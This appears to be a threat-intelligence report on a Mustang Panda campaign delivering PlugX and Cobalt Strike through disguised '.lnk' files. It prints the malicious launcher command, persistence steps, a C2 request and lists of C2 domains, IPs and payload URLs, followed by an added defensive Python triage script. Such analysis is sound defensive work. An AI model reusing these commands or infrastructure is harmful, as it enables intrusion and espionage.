The observed TTPs consist of the following:</p> <ol> <li>Use of a zip file that contains a “.lnk” (Windows Shortcut) file.</li> <li>Use of the double-extension trick (sample.doc.lnk) to convince users to open the file.</li> <li>HTA (HTML Application) with VBScript embedded in the “.lnk” file.</li> <li>VBScript drops payloads and opens a decoy document or PDF for the user.</li> <li>Use of PlugX and Cobalt Strike payloads.<sup>[2]</sup></li> </ol> <p>The infection chain observed by Anomali researchers in this campaign is shown below in Figure 1.</p> <p style="text-align: center;"><em><img alt="Figure 1 – Infection vector" src="https://cdn.filestackcontent.com/y4n8QQVFSSueTIlWKe2T"/><br/> Figure 1 – Infection vector</em></p> <p>We also found similarities in targeting, namely Mongolia and an NGO. The use of United Nations’ documents regarding activities in the Middle East may also be indicative of think-tank targeting. Furthermore, the use of PlugX malware also aligns with CrowdStrike’s previous findings of activity attributed to Mustang Panda.<sup>[3]</sup></p> <p>Analysts’ note: The language skills needed to read some of the lure documents are not available within Anomali at this time. We would encourage those with the necessary language skills to analyze the documents further.</p> <h2>Targeting</h2> <p>In mid-August 2019, the Anomali Threat Research Team discovered suspicious “.lnk” files during routine intelligence collection. While the distribution method of these documents cannot be confirmed at this time, it is likely that spearphishing is being used: it aligns with Mustang Panda’s TTPs, and it is a common tactic amongst APT actors. 
The lure documents are also highly specific in their targeting, and the targeted entities and individuals would be of interest to a China-sponsored threat group.</p> <p>Further analysis of the files led to the identification of other “.lnk” files that were attempting to infect individuals with a Cobalt Strike Beacon (penetration-testing tool) or PlugX (a Remote Access Tool (RAT)); other payloads could not be identified as of this writing. Anomali researchers identified 15 malicious documents that we believe were used by Mustang Panda in an ongoing campaign. The documents reveal malicious activity dating from at least November 2018 up to August 29, 2019. The date of this activity is confirmed by the VirusTotal (VT) submission dates, which will be analyzed further in the following sections. In addition, the dates within the documents go back as far as October 8, 2017; it is therefore possible that this activity goes back to 2017, if the group was using current content in its lures. The primary target of this campaign was found to be the ruling political party of Vietnam, the Communist Party of Vietnam (CPV); other targets observed in the malicious documents include the following:</p> <ul> <li>CPV of Lang Son province, Vietnam</li> <li>CPV of Lao Cai province, Vietnam</li> <li>Embassy of Vietnam, China</li> <li>Henan Provincial Party Committee, Vietnam</li> <li>Individuals who would find United Nations’ documents of interest, potentially think tanks</li> <li>MIAT Airlines, Mongolian airline</li> <li>Police of Sindh Province, Pakistan</li> <li>Restoration Council of Shan State / Shan State Army, Loi Tai Leng, Southern Shan State, Myanmar (Burma)</li> <li>The China Center (China Zentrum e.V), Germany</li> </ul> <p>The lure documents are themed to be relevant to their targets, and in some cases are copies of legitimate documents that are publicly available. 
The “.lnk” files used by Mustang Panda typically contain an embedded HTA script that, once executed, drops and opens the decoy document while the payload’s malicious activity runs in the background. The final type of malicious document we observed was empty and contained only an image, such as a request to enable macros, intended to distract the user while malicious activity takes place in the background.</p> <h2>Lure Document Analysis</h2> <p>The 15 documents will be discussed below from the most recent VT submission to the earliest. The identified samples follow the same infection chain, and the technical analysis will be discussed in a later section.</p> <p><strong>Document</strong> – 1<br/> <strong>Document Title</strong> – TCO BT574.doc<br/> <strong>Sample</strong> – 05CF906B750EB335125695DA42F4EAFC<br/> <strong>Payload</strong> – Cobalt Strike<br/> <strong>Submission date</strong> – 8/29/2019 1:27:41 AM</p> <p style="text-align: center;"><em><img alt="Figure 2 – TCO BT574.doc" src="https://cdn.filestackcontent.com/jfI7wHEiQumgR8DKJtC4"/><br/> Figure 2 – TCO BT574.doc</em></p> <p>As seen above, this document is addressed to the Embassy of Vietnam in China. The document appears to discuss a warning issued to the Vietnamese government related to a military exercise at a set of coordinates. Specifically, the document states that no civilian ships are allowed at said coordinates. The document goes on to mention a new icebreaker called “Snow Dragon 2” and names August 15, 2019 as the beginning of a 35-day trial run. 
This document indicates a specific regional interest.</p> <p><strong>Document</strong> – 2<br/> <strong>Document Title</strong> – 32_1.PDF<br/> <strong>Sample</strong> – 9A180107EFB15A00E64DB3CE6394328D<br/> <strong>Payload</strong> – Cobalt Strike Beacon<br/> <strong>Submission date</strong> – 8/26/2019 6:28:40 AM</p> <p style="text-align: center;"><em><img alt="Figure 3 – 32_1.pdf" src="https://cdn.filestackcontent.com/bvCv0P95T9GVw4hHemwO"/><br/> Figure 3 – 32_1.pdf</em></p> <p>Mustang Panda is using this decoy document, dated August 15, 2019, to target the People’s Committee of Lang Son Province. The People’s Committee is the executive branch of a Vietnamese province.<sup>[4]</sup> Lang Son province shares a border with China’s Guangxi Province. The area has historically served as an important location for trade, and control over it has therefore long been disputed and fought over.<sup>[5]</sup> The border shared between China and Vietnam measures 1,281 km in length, and multiple wars have been fought over it at the cost of numerous lives; the complexities and intricacies of those conflicts will not be discussed further.<sup>[6]</sup></p> <p><strong>Document</strong> – 3<br/> <strong>Document Title</strong> – Daily News (19-8-2019)<br/> <strong>Sample</strong> – 5F094CB3B92524FCED2731C57D305E78<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 8/19/2019 6:11:32 AM</p> <p style="text-align: center;"><em><img alt="Figure 4 – Daily News (19-8-2019)" src="https://cdn.filestackcontent.com/R7QPTzQwTnebIkNjiBPD"/><br/> Figure 4 – Daily News (19-8-2019)</em></p> <p>This document appears to be targeting the Shan Tai people by using a document referencing the Restoration Council of Shan State (RCSS). 
The Shan Tai people make up the largest minority group in Myanmar (Burma) and are located in northwestern and eastern Myanmar (Burma) and in the Yunnan province of China.<sup>[7]</sup> The RCSS, also referred to as the Shan State Army (SSA), is a government/political organization headquartered in Loi Tai Leng, Southern Shan State, in present-day Myanmar (Burma), bordering Thailand.<sup>[8]</sup> The targeting of minority groups is a known tactic used by the government of the People’s Republic of China.</p> <p><strong>Document</strong> – 4<br/> <strong>Document Title</strong> – S_2019_50_E.lnk<br/> <strong>Sample</strong> – 4FE276EDC21EC5F2540C2BABD81C8653<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 6/6/2019 9:37:18 AM</p> <p style="text-align: center;"><em><img alt="Figure 5 – S_2019_50_E.docx" src="https://cdn.filestackcontent.com/oCkLkzrmQNC7EtxeAv3i"/><br/> Figure 5 – S_2019_50_E.docx</em></p> <p>Mustang Panda retrieved this document, titled “Letter dated 15 January 2019 from the Chair of the Security Council Committee Established pursuant to Resolutions 1267 (1999), 1989 (2011) and 2253 (2015) concerning Islamic State in Iraq and the Levant (Da'esh), Al-Qaida and Associated Individuals, Groups, Undertakings and Entities addressed to the President of the Security Council,” from the United Nations Digital Library.<sup>[9]</sup></p> <p>At the time of this writing, it is unknown who or what this document may be targeting. 
However, think-tank organizations may be interested in such a document, and such organizations were found to be targets of Mustang Panda by CrowdStrike.<sup>[10]</sup></p> <p><strong>Document</strong> – 5<br/> <strong>Document Title</strong> – European.lnk<br/> <strong>Sample</strong> – 9FF1D3AF1F39A37C0DC4CEEB18CC37DC<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 6/5/2019 6:28:25 PM</p> <p style="text-align: center;"><em><img alt="Figure 6 – European.lnk" src="https://cdn.filestackcontent.com/bwhR0rpIQgpxDhmMMSEc"/><br/> Figure 6 – European.lnk</em></p> <p>“European.doc” is targeting The China Center (China Zentrum e.V), which is, according to its website, a non-profit organization that “encourages encounters and exchange between cultures and religions in the West and in China. The members of the China-Zentrum are Catholic aid organizations, religious orders and dioceses in Germany, Austria, Switzerland and Italy.”<sup>[11]</sup></p> <p>Targeting of NGOs was first documented by CrowdStrike, and we believe we have observed Mustang Panda attempting to attack a similar type of target.<sup>[12]</sup> In addition, an institution focused on exchanging cultural knowledge aligns with China’s strategic interests.</p> <h2>Targeting Pakistan</h2> <p>Upon pivoting from the C2 domain apple-net[.]com, observed in the other samples that are part of the campaign, Anomali found a malicious sample that targets the Police of the Sindh Province in Pakistan. 
PlugX was observed as the payload in the sample targeting the Sindh Province police.</p> <p style="text-align: center;"><em><img alt="Figure 7 – Samples Connecting to apple-net[.]com" src="https://cdn.filestackcontent.com/4fEHm9JlTOic9xhJQi9Y"/><br/> Figure 7 – Samples Connecting to apple-net[.]com</em></p> <p style="text-align: center;"><em><img alt="Figure 8 – DSR &amp; CSR of Special Branch Sind.exe" src="https://cdn.filestackcontent.com/4YdqcEqKSYKupmOdV1w8"/><br/> Figure 8 – DSR &amp; CSR of Special Branch Sind.exe</em></p> <h2>Technical Analysis</h2> <p>The “.lnk” files used by Mustang Panda typically contain an embedded HTA file with a VBScript or PowerShell script that, once executed, drops and opens the decoy document while the payload’s malicious activity runs in the background. Throughout the campaign we observed PlugX and Cobalt Strike being delivered as the primary payloads.</p> <p style="text-align: center;"><em><img alt="Figure 9 – Infection vector" src="https://cdn.filestackcontent.com/lX9bt3vfQHmuNwsCxLa5"/><br/> Figure 9 – Infection vector</em></p> <h3>“.lnk” File Analysis</h3> <p>In Windows, “.lnk” is the file extension for shortcut files, which point to an executable file. “.lnk” files usually hold plenty of forensic artifacts, and they can reveal valuable information about the threat actor’s environment. 
The metadata from the “.lnk” files led us to pivot to more samples from the same campaign.</p> <p style="text-align: center;"><em><img alt="Figure 10 – “.lnk” File" src="https://cdn.filestackcontent.com/lhM4qsRRaWc1LgysWwtQ"/><br/> Figure 10 – “.lnk” File</em></p> <p>Table 1 below shows the files that were part of the recent campaign from Mustang Panda.</p> <p style="text-align: center;"><em>Table 1 – Analyzed Samples</em></p> <table class="table table-striped" style="table-layout: fixed;"> <tbody> <tr> <th>MD5</th> <th>Link Creation Date</th> <th>File Name</th> <th>Payload</th> </tr> <tr> <td style="word-wrap: break-word;">165F8683681A4B136BE1F9D6EA7F00CE</td> <td>11/21/10 3:24</td> <td>chuong trinh dang huong.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">9FF1D3AF1F39A37C0DC4CEEB18CC37DC</td> <td>11/21/10 3:24</td> <td>European.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">4FE276EDC21EC5F2540C2BABD81C8653</td> <td>11/21/10 3:24</td> <td>S_2019_50_E.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">11ADDA734FC67B9CFDF61396DE984559</td> <td>11/21/10 3:24</td> <td>Chuong trinh hoi nghi.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">08F25A641E8361495A415C763FBB9B71</td> <td>11/21/10 3:24</td> <td>GIAY MOI.doc.lnk</td> <td>Cobalt Strike</td> </tr> <tr> <td style="word-wrap: break-word;">01D74E6D9F77D5202E7218FA524226C4</td> <td>11/21/10 3:24</td> <td>421 CV.doc.lnk</td> <td>Cobalt Strike</td> </tr> <tr> <td style="word-wrap: break-word;">6198D625ADA7389AAC276731CDEBB500</td> <td>11/21/10 3:24</td> <td>GIAYMOI.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">9B39E1F72CF4ACFFD45F45F08483ABF0</td> <td>11/21/10 3:24</td> <td>CV trao doi CAT Cao Bang.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">748DE2B2AA1FA23FA5996F287437AF1B</td> <td>11/20/10 21:29</td> 
<td>cf56ee00be8ca49d150d85dcb6d2f336.jpg.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">5F094CB3B92524FCED2731C57D305E78</td> <td>11/21/10 3:24</td> <td>Daily News (19-8-2019)(Soft Copy).lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">9A180107EFB15A00E64DB3CE6394328D</td> <td>11/21/10 3:24</td> <td>32_1.PDF.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">05CF906B750EB335125695DA42F4EAFC</td> <td>11/21/10 3:24</td> <td>TCO BT 574.doc.lnk</td> <td>Cobalt strike</td> </tr> <tr> <td style="word-wrap: break-word;">F62DFC4999D624D01E94B89946EC1036</td> <td>11/21/10 3:24</td> <td>sach tham khao Bo mon.docx.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">CA775717D000888A7F71A5907B9C9208</td> <td>11/21/10 3:24</td> <td>tieu luan ve quyen lam chu cua nhan dan.docx.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">AA115F20472E78A068C1BBF739C443BF</td> <td>11/21/10 3:24</td> <td>vai tro cua nhan dan.doc.lnk</td> <td>PlugX</td> </tr> <tr> <td style="word-wrap: break-word;">11511b3d69fbb6cceaf1dd0278cbedfb</td> <td>11/21/10 3:24</td> <td>For National Department Sar KNU JMC people Meeting 2019.lnk</td> <td>PlugX</td> </tr> </tbody> </table> <p>Once the user opens the “.lnk” file, the embedded HTA file is executed via “mshta.exe”; it then writes a PowerShell script named “3.ps1” to the “%TEMP%” directory. 
The PowerShell script is then executed using Windows Management Instrumentation (WMI) in a hidden window, via WMI Tasks.<sup>[13]</sup></p> <p style="text-align: center;"><em><img alt="Figure 11 – VBScript drops PowerShell script" src="https://cdn.filestackcontent.com/Q6vUTjTPeLSiovqEWB4w"/><br/> Figure 11 – VBScript drops PowerShell script</em></p> <p style="text-align: center;"><em><img alt="Figure 12 – Using WMI to execute PowerShell Script in Hidden window" src="https://cdn.filestackcontent.com/jy9OTfjRruoJJpllyO7G"/><br/> Figure 12 – Using WMI to execute PowerShell Script in Hidden window</em></p> <p>The dropped file “3.ps1” is a base64-encoded PowerShell script. Upon execution it performs the following operations on the target host:</p> <ol> <li>Checks whether the user has Administrator privileges</li> <li>Drops the Cobalt Strike stager as “tmp_FlVnNI.dat” in the debug or “%TEMP%” directory, depending on the user’s privileges</li> <li>Opens the decoy Word document</li> <li>Locates InstallUtil.exe and its installed version</li> <li>Copies “schtasks.exe” to the “%TEMP%” directory and renames it to “wtask.exe”</li> <li>Creates a scheduled task with the name “Security Script kb00855787”</li> <li>Renames “wscript.exe” to “winwsh.exe”</li> <li>Runs the scheduled task to execute the Cobalt Strike stager</li> <li>C2 communication</li> </ol> <p style="text-align: center;"><em><img alt="Figure 13 – Scheduled Task Creation" src="https://cdn.filestackcontent.com/unrWhdRtTACc7O1MhLzx"/><br/> Figure 13 – Scheduled Task Creation</em></p> <p style="text-align: center;"><em><img alt="Figure 14 – PowerShell Script Creates Scheduled Task" src="https://cdn.filestackcontent.com/RfyFg3DQuOFIYxoAshL5"/><br/> Figure 14 – PowerShell Script Creates Scheduled Task</em></p> <p style="text-align: center;"><em><img alt="Figure 15 – Cobalt Strike Payload" src="https://cdn.filestackcontent.com/2OfnXlVCQquS5ftxheGA"/><br/> Figure 15 – Cobalt Strike Payload</em></p> <p>During our analysis, we could not acquire 
the second-stage payload, as the C2 servers were not functioning or had been taken down by the threat actors.</p> <h3>PlugX Payload Analysis</h3> <p>“.lnk” files that used PlugX as the payload were abnormally large. In general, “.lnk” files are smaller than 10 KB, but the malicious samples in this campaign were larger than 700 KB. On closer inspection we found that the “.lnk” files had three base64-encoded executables embedded in them.</p> <p>When the LNK file is opened, it executes the following command via cmd.exe.</p> <p><strong>command:</strong> /c for %x in (%temp%=%cd%) do for /f "delims==" %i in ('dir "%x ieu luan ve quyen lam chu cua nhan dan.docx.lnk" /s /b') do start m%windir:~-1,1%hta .exe "%i"</p> <p>The command executes the HTA file embedded inside the shortcut, which decodes and drops three executables in the “%TEMP%” directory and opens a decoy Word document for the user.</p> <p style="text-align: center;"><em><img alt="Figure 16 – Extracted binaries and Decoy document" src="https://cdn.filestackcontent.com/KLb2O2GOTgGYHNRAFWDV"/><br/> Figure 16 – Extracted binaries and Decoy document</em></p> <p>All three dropped files were then moved to a new folder, “C:\ProgramData\Microsoft Malware Protection\GHQ”.</p> <p style="text-align: center;"><em><img alt="Figure 17 – Binaries moved to different path" src="https://cdn.filestackcontent.com/85tIfVOtT8WVTb3jSa2o"/><br/> Figure 17 – Binaries moved to different path</em></p> <p>“3.exe” is a legitimate executable signed by “ESET, spol. 
s r.o.”, and it is abused via a DLL hijacking technique to execute http_dll.dll, which decodes and loads the malicious payload http_dll.dat.</p> <p style="text-align: center;"><em>Table 2 – PlugX Hashes</em></p> <table class="table table-striped" style="table-layout: fixed;"> <thead> <tr> <th>File Name</th> <th>Hash</th> </tr> </thead> <tbody> <tr> <td>3.exe (original name: EHttpSrv.exe)</td> <td style="word-wrap: break-word;">28C6F235946FD694D2634C7A2F24C1BA</td> </tr> <tr> <td>http_dll.dll</td> <td style="word-wrap: break-word;">9912EB641EABD640A476720C51F5E3AD</td> </tr> <tr> <td>http_dll.dat</td> <td style="word-wrap: break-word;">2BC7298A57AE2B8AB5B4A7B53360EB5C</td> </tr> </tbody> </table> <p>After execution, the payload reaches out to the C2 via a POST request, as shown below.</p> <pre>
POST /update?wd=4337295e HTTP/1.1
Accept: */*
x-debug: 0
x-request: 0
x-content: 61456
x-storage: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
Host: aridndvn.ccom:443
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache
</pre> <p>If the C2 is not available, the payload tries to reach different embedded C2 domains on unique ports.</p> <p style="text-align: center;"><em><img alt="Figure 18 – Network connections to C2" src="https://cdn.filestackcontent.com/wONhRfObTXCh731MRBQz"/><br/> Figure 18 – Network connections to C2</em></p> <h2>Conclusion</h2> <p>The malicious operations conducted by Mustang Panda in this campaign appear to be ongoing. The targets, indicated by the specific lure documents, are government entities or otherwise align strategically with the interests of a China-sponsored APT group. China is currently in its 13th Five-Year Plan (2016-2020), which focuses on the following themes: innovation, coordinated development, green growth, openness, and inclusive growth.<sup>[14]</sup> The objective of increasing exports and specific imports, which falls under openness, would align with the targeting of the Lang Son province and its history of trade. 
Utilizing lures themed around political parties, the Sindh police, and UN documents would align with innovation, which is described “as the cornerstone of China’s development strategy” and attempts at “enhancing its future global competitiveness and technological edge.”<sup>[15]</sup> Targeting the entities, or related entities, referenced in said lures indicates a potential regional interest in strategic information that may be of significance to a government. In addition, the TTPs observed by CrowdStrike are identical to the ones observed by Anomali.</p> <p>This activity has been ongoing since at least November 2018, and possibly as far back as October 2017 if the lure documents were distributed around the times mentioned in them. This kind of China-sponsored malicious activity will likely continue as the country expands its efforts for the ongoing Belt and Road Initiative, which seeks to invest in infrastructure in over 100 countries. Such economic and investment-led initiatives will make China more interested in the regions it is investing in; it is therefore likely that APT-related activity will follow.</p> <h2>IOCs</h2> <p>In addition, Anomali Threat Research (ATR) found that the documents were attempting to connect, or were able to connect, to the following Command and Control (C2) domains and IP addresses:</p> <table class="table table-striped"> <tbody> <tr> <th>Domain</th> <th>IPs</th> <th>First Seen</th> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.94</td> <td>6/29/19 22:03</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.67</td> <td>6/24/19 16:30</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.82</td> <td>6/7/19 1:31</td> </tr> <tr> <td>adobephotostage.com</td> <td>184.168.221.94</td> <td>6/22/19 3:30</td> </tr> <tr> <td>adobephotostage.com</td> <td>184.168.221.82</td> <td>6/19/19 14:24</td> </tr> <tr> <td>adobephotostage.com</td> <td>184.168.221.71</td> <td>6/10/19 6:57</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.73</td> <td>6/1/19 9:49</td> 
</tr> <tr> <td>adobephotostage.com</td> <td>207.148.12.47</td> <td>6/7/18 10:05</td> </tr> <tr> <td>adobephotostage.com</td> <td>149.28.74.41</td> <td>6/4/18 11:33</td> </tr> <tr> <td>adobephotostage.com</td> <td>207.148.78.101</td> <td>5/31/18 3:26</td> </tr> <tr> <td>adobephotostage.com</td> <td>149.28.74.149</td> <td>5/24/18 7:19</td> </tr> <tr> <td>adobephotostage.com</td> <td>50.63.202.59</td> <td>5/22/18 20:29</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.200</td> <td>9/11/19 23:17</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.199</td> <td>8/3/19 1:29</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.197</td> <td>8/3/19 1:29</td> </tr> <tr> <td>olk4.com</td> <td>198.54.117.198</td> <td>8/3/19 1:29</td> </tr> <tr> <td>olk4.com</td> <td>162.255.119.150</td> <td>7/25/19 8:20</td> </tr> <tr> <td>apple-net.com</td> <td>167.88.180.148</td> <td>6/12/19 23:41</td> </tr> <tr> <td>apple-net.com</td> <td>167.88.177.224</td> <td>3/22/19 3:11</td> </tr> <tr> <td>apple-net.com</td> <td>167.88.180.3</td> <td>10/29/18 12:21</td> </tr> <tr> <td>apple-net.com</td> <td>45.248.87.14</td> <td>10/21/18 18:20</td> </tr> <tr> <td>apple-net.com</td> <td>91.195.240.117</td> <td>8/6/18 7:08</td> </tr> <tr> <td>apple-net.com</td> <td>103.224.182.250</td> <td>4/25/18 11:40</td> </tr> <tr> <td>wbemsystem.com</td> <td>167.88.177.224</td> <td>7/29/19 0:00</td> </tr> <tr> <td>yahoorealtors.com</td> <td>167.88.178.24</td> <td>7/4/19 13:00</td> </tr> <tr> <td>yahoorealtors.com</td> <td>185.239.226.19</td> <td>6/25/19 0:00</td> </tr> <tr> <td>yahoorealtors.com</td> <td>185.239.226.19</td> <td>4/3/19 1:17</td> </tr> <tr> <td>yahoorealtors.com</td> <td>45.77.209.52</td> <td>1/18/18 7:11</td> </tr> <tr> <td>infosecvn.com</td> <td>167.88.178.118</td> <td>8/27/19 2:14</td> </tr> <tr> <td>infosecvn.com</td> <td>185.239.226.61</td> <td>7/10/18 1:02</td> </tr> <tr> <td>infosecvn.com</td> <td>45.77.184.12</td> <td>5/30/18 16:29</td> </tr> <tr> <td>airdndvn.com</td> <td>167.88.178.118</td> 
<td>6/27/19 0:00</td> </tr> <tr> <td>airdndvn.com</td> <td>185.239.226.61</td> <td>6/14/18 9:43</td> </tr> <tr> <td>airdndvn.com</td> <td>45.77.184.12</td> <td>5/31/18 13:50</td> </tr> <tr> <td>officeproduces.com</td> <td>45.32.50.150</td> <td>7/25/19 7:10</td> </tr> <tr> <td>web.adobephotostage.com</td> <td> </td> <td> </td> </tr> <tr> <td>Web.officeproduces.com:8080</td> <td> </td> <td> </td> </tr> <tr> <td>Up.officeproduces.com</td> <td> </td> <td> </td> </tr> <tr> <td>We.officeproduces.com</td> <td> </td> <td> </td> </tr> <tr> <td>Download.officeproduces.com:443</td> <td> </td> <td> </td> </tr> <tr> <td>geocities.jp</td> <td> </td> <td> </td> </tr> <tr> <td>update.olk4.com:53</td> <td> </td> <td> </td> </tr> <tr> <td>www.cab-sec.com</td> <td>167.88.180.15</td> <td>09/18/2019 3:10</td> </tr> <tr> <td> </td> <td>43.254.217.67</td> <td> </td> </tr> <tr> <td> </td> <td>154.221.24.47</td> <td> </td> </tr> <tr> <td> </td> <td>144.202.54.86</td> <td> </td> </tr> </tbody> </table> <h2>URLs</h2> <ul> <li>http://144.202.54.86/vkt2</li> <li>http://144.202.54.86/download/Mau2.hta</li> <li>http://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Chua%20Dang%20vien.docx</li> <li>http://airdndvn.com/6CDC9F833C87FB661DBB9339</li> <li>http://www.wbemsystem.com/B2FC407BB86E8219/397A4853</li> <li>web.officeproduces.com:8000/update?wd=1b1fe9aa</li> <li>154.221.24.47/HaQ3</li> </ul> <h2>File Hashes</h2> <p>165F8683681A4B136BE1F9D6EA7F00CE<br/> 9FF1D3AF1F39A37C0DC4CEEB18CC37DC<br/> 4FE276EDC21EC5F2540C2BABD81C8653<br/> 11ADDA734FC67B9CFDF61396DE984559<br/> 08F25A641E8361495A415C763FBB9B71<br/> 01D74E6D9F77D5202E7218FA524226C4<br/> 6198D625ADA7389AAC276731CDEBB500<br/> 9B39E1F72CF4ACFFD45F45F08483ABF0<br/> 748DE2B2AA1FA23FA5996F287437AF1B<br/> 5F094CB3B92524FCED2731C57D305E78<br/> 9A180107EFB15A00E64DB3CE6394328D<br/> 05CF906B750EB335125695DA42F4EAFC<br/> F62DFC4999D624D01E94B89946EC1036<br/> CA775717D000888A7F71A5907B9C9208<br/> AA115F20472E78A068C1BBF739C443BF</p> 
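<p>As an added illustration of the two “.lnk” observations made above (the forensic value of the shortcut header in the “.lnk” File Analysis section, and the abnormal 700 KB+ size of the PlugX carriers in the PlugX Payload Analysis section), the Python below is example code written for this edit, not tooling from Anomali. It parses the fixed 76-byte ShellLinkHeader defined in Microsoft’s MS-SHLLINK specification, converts its FILETIME fields (the link target’s timestamps as recorded on the machine where the shortcut was built, which is what makes them useful for pivoting), decodes the LinkFlags and ShowCommand fields, and applies three triage checks: a document-like double extension, a shortcut far larger than a normal one, and a target launched with arguments in a minimized, inactive window. The shortcut it builds with <code>build_sample_lnk</code> is constructed test data, not a sample from the campaign; the size threshold and the double-extension names come from the report, while the SW_SHOWMINNOACTIVE check is a general shortcut heuristic that the page itself does not state.</p>

```python
import struct
from datetime import datetime, timedelta, timezone

# Fixed-size ShellLinkHeader layout from MS-SHLLINK: 76 bytes, little-endian.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_FMT = "<I16sIIQQQIIIHHII"
LINK_FLAGS = {0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
              0x08: "HasRelativePath", 0x10: "HasWorkingDir", 0x20: "HasArguments",
              0x40: "HasIconLocation", 0x80: "IsUnicode"}
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}

# Size heuristic from the report: ordinary .lnk files are under 10 KB, while the
# PlugX carriers in this campaign exceeded 700 KB because of embedded base64 PEs.
SUSPICIOUS_SIZE = 700 * 1024
# Document extensions a shortcut may masquerade as (the sample.doc.lnk trick).
DISGUISE_EXTS = (".doc", ".docx", ".pdf", ".jpg", ".xls", ".xlsx")
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Constructed timestamp for the synthetic sample (matches the date format of Table 1).
SAMPLE_CREATION = datetime(2010, 11, 21, 3, 24, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    delta = dt - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_lnk_header(data):
    """Parse the 76-byte ShellLinkHeader; raise ValueError if data is not a shell link."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    fields = struct.unpack_from(HEADER_FMT, data, 0)
    hdr_size, clsid, flags, _attrs, ctime, _atime, wtime, fsize, _icon, show = fields[:10]
    if hdr_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("bad header size or CLSID")
    return {
        "link_flags": [name for bit, name in LINK_FLAGS.items() if flags & bit],
        "creation_time": filetime_to_datetime(ctime),
        "write_time": filetime_to_datetime(wtime),
        "target_size": fsize,
        "show_command": SHOW_COMMANDS.get(show, "unknown(%d)" % show),
    }


def triage_lnk(filename, data):
    """Return (header, findings) for one shortcut; findings is empty for an unremarkable file."""
    header = parse_lnk_header(data)
    findings = []
    stem = filename.lower()
    stem = stem[:-4] if stem.endswith(".lnk") else stem
    if stem.endswith(DISGUISE_EXTS):
        findings.append("double extension: shortcut named like a %s document" % stem.rsplit(".", 1)[-1])
    if len(data) >= SUSPICIOUS_SIZE:
        findings.append("oversized shortcut (%d bytes); embedded payload likely" % len(data))
    if "HasArguments" in header["link_flags"] and header["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("launches its target with arguments in a minimized, inactive window")
    return header, findings


def build_sample_lnk(creation=SAMPLE_CREATION, body_len=0, flags=0x80 | 0x20, show=7):
    """Constructed test data: a synthetic header plus filler bytes, not a real campaign sample."""
    ft = datetime_to_filetime(creation)
    header = struct.pack(HEADER_FMT, LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         ft, ft, ft, 0, 0, show, 0, 0, 0, 0)
    return header + b"\x00" * body_len


if __name__ == "__main__":
    hdr, notes = triage_lnk("32_1.PDF.lnk", build_sample_lnk(body_len=750 * 1024))
    print(hdr["creation_time"], hdr["link_flags"], hdr["show_command"])
    for note in notes:
        print("-", note)
```

<p>On a real collection, replace <code>build_sample_lnk</code> with the bytes of each shortcut and group the results by creation time and flags: identical header timestamps across otherwise unrelated file names are the kind of shared artifact that allows pivoting from one sample to the rest of a campaign.</p>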
<h2>Endnotes</h2> <p><sup>[1]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog, accessed September 17, 2019, published June 15, 2018, https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/.</p> <p><sup>[2]</sup> Ibid.</p> <p><sup>[3]</sup> Ibid.</p> <p><sup>[4]</sup> Dr. Joop de Wit, “Decentralisation, Local Governance and Community Participation in Vietnam,” United Nations (2016): 5, accessed September 18, 2019, http://www.un.org.vn/en/publications/one-un-documents/cat_view/106-one-un-documents/124-reference-documents.html.</p> <p><sup>[5]</sup> Kathy Wilheml, “China, Vietnam Make Money, Not War; Border Tensions Remain : Asia: Many fear the dispute over Friendship Pass and more than 200 other sites could reignite fighting between the longtime enemies,” Los Angeles Times, accessed September 18, 2019, published October 22, 1995, https://www.latimes.com/archives/la-xpm-1995-10-22-mn-59742-story.html.</p> <p><sup>[6]</sup> “Vietnam – Geography,” GlobalSecurity, accessed September 18, 2019, https://www.globalsecurity.org/military/world/vietnam/geography.htm.</p> <p><sup>[7]</sup> The Editors of Encyclopaedia Britannica, “Shan,” Encyclopaedia Britannica, accessed September 17, 2019, 